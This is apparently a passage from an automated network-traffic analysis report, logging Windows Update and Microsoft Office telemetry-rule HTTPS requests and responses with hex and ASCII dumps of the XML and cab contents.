                                  2024-11-25 23:29:08 UTC16384INData Raw: 20 54 3d 22 32 22 20 46 3d 22 41 76 65 72 61 67 65 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d
                                  Data Ascii: T="2" F="Average" /> </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F=
                                  2024-11-25 23:29:08 UTC16384INData Raw: 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a
                                  Data Ascii: alse"> <C> <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C>
                                  2024-11-25 23:29:08 UTC16384INData Raw: 20 49 3d 22 31 39 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70
                                  Data Ascii: I="19" O="false" N="Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="Cleanup
                                  2024-11-25 23:29:08 UTC16384INData Raw: 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20
                                  Data Ascii: </L> <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R>
                                  2024-11-25 23:29:09 UTC16384INData Raw: 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20
                                  Data Ascii: </O> </F> </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C>
                                  2024-11-25 23:29:09 UTC16384INData Raw: 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                  Data Ascii: O T="AND"> <L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" />
                                  2024-11-25 23:29:09 UTC16384INData Raw: 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20
                                  Data Ascii: <S T="2" F="HttpStatus" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" />


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  19192.168.2.4497664.175.87.197443
                                  TimestampBytes transferredDirectionData
                                  2024-11-25 23:29:08 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Wb5MDaLXKmrWLk9&MD=h3V7Md7x HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept: */*
                                  User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                  Host: slscr.update.microsoft.com
                                  2024-11-25 23:29:08 UTC560INHTTP/1.1 200 OK
                                  Cache-Control: no-cache
                                  Pragma: no-cache
                                  Content-Type: application/octet-stream
                                  Expires: -1
                                  Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                  ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                  MS-CorrelationId: 6a38d5c5-6a58-422a-b9f5-08adc8450055
                                  MS-RequestId: 02a58167-993f-49b3-8333-1fd10fab2d12
                                  MS-CV: KiH7+HUzEkiBjXSO.0
                                  X-Microsoft-SLSClientCache: 1440
                                  Content-Disposition: attachment; filename=environment.cab
                                  X-Content-Type-Options: nosniff
                                  Date: Mon, 25 Nov 2024 23:29:07 GMT
                                  Connection: close
                                  Content-Length: 30005
                                  2024-11-25 23:29:08 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                  Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                  2024-11-25 23:29:08 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                  Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  20192.168.2.44976713.107.246.63443
                                  TimestampBytes transferredDirectionData
                                  2024-11-25 23:29:10 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-25 23:29:11 UTC515INHTTP/1.1 200 OK
                                  Date: Mon, 25 Nov 2024 23:29:11 GMT
                                  Content-Type: text/xml
                                  Content-Length: 3788
                                  Connection: close
                                  Vary: Accept-Encoding
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                  ETag: "0x8DC582BAC2126A6"
                                  x-ms-request-id: 0b3277ea-501e-00a0-5e91-3f9d9f000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241125T232911Z-174f7845968xlwnmhC1EWR0sv80000000ud00000000008pr
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  X-Cache-Info: L1_T2
                                  Accept-Ranges: bytes
                                  2024-11-25 23:29:11 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  21192.168.2.44976913.107.246.63443
                                  TimestampBytes transferredDirectionData
                                  2024-11-25 23:29:10 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-25 23:29:11 UTC515INHTTP/1.1 200 OK
                                  Date: Mon, 25 Nov 2024 23:29:11 GMT
                                  Content-Type: text/xml
                                  Content-Length: 2980
                                  Connection: close
                                  Vary: Accept-Encoding
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                  ETag: "0x8DC582BA80D96A1"
                                  x-ms-request-id: 0a3cdbcf-401e-0016-597f-3f53e0000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241125T232911Z-174f7845968cpnpfhC1EWR3afc0000000uag0000000005rf
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache-Info: L1_T2
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-25 23:29:11 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  22192.168.2.44976813.107.246.63443
                                  TimestampBytes transferredDirectionData
                                  2024-11-25 23:29:10 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-25 23:29:11 UTC491INHTTP/1.1 200 OK
                                  Date: Mon, 25 Nov 2024 23:29:11 GMT
                                  Content-Type: text/xml
                                  Content-Length: 450
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                  ETag: "0x8DC582BD4C869AE"
                                  x-ms-request-id: 59158d4f-901e-00a0-5491-3f6a6d000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241125T232911Z-174f7845968qj8jrhC1EWRh41s0000000uh000000000079y
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  X-Cache-Info: L1_T2
                                  Accept-Ranges: bytes
                                  2024-11-25 23:29:11 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  23192.168.2.44977113.107.246.63443
                                  TimestampBytes transferredDirectionData
                                  2024-11-25 23:29:10 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-25 23:29:11 UTC515INHTTP/1.1 200 OK
                                  Date: Mon, 25 Nov 2024 23:29:11 GMT
                                  Content-Type: text/xml
                                  Content-Length: 2160
                                  Connection: close
                                  Vary: Accept-Encoding
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                  ETag: "0x8DC582BA3B95D81"
                                  x-ms-request-id: 6eac4bdd-a01e-006f-1c91-3f13cd000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241125T232911Z-174f7845968g6hv8hC1EWR1v2n00000002fg000000000ad6
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  X-Cache-Info: L1_T2
                                  Accept-Ranges: bytes
                                  2024-11-25 23:29:11 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  24192.168.2.44977013.107.246.63443
                                  TimestampBytes transferredDirectionData
                                  2024-11-25 23:29:10 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-25 23:29:11 UTC491INHTTP/1.1 200 OK
                                  Date: Mon, 25 Nov 2024 23:29:11 GMT
                                  Content-Type: text/xml
                                  Content-Length: 408
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                  ETag: "0x8DC582BB56D3AFB"
                                  x-ms-request-id: dc0e4179-901e-005b-2991-3f2005000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241125T232911Z-174f7845968n2hr8hC1EWR9cag0000000uag0000000008at
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  X-Cache-Info: L1_T2
                                  Accept-Ranges: bytes
                                  2024-11-25 23:29:11 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  25192.168.2.44977313.107.246.63443
                                  TimestampBytes transferredDirectionData
                                  2024-11-25 23:29:13 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-25 23:29:13 UTC491INHTTP/1.1 200 OK
                                  Date: Mon, 25 Nov 2024 23:29:13 GMT
                                  Content-Type: text/xml
                                  Content-Length: 474
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                  ETag: "0x8DC582B9964B277"
                                  x-ms-request-id: 8ccd6c39-f01e-0085-6e81-3f88ea000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241125T232913Z-174f7845968nxc96hC1EWRspw80000000uf00000000003wc
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache-Info: L1_T2
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
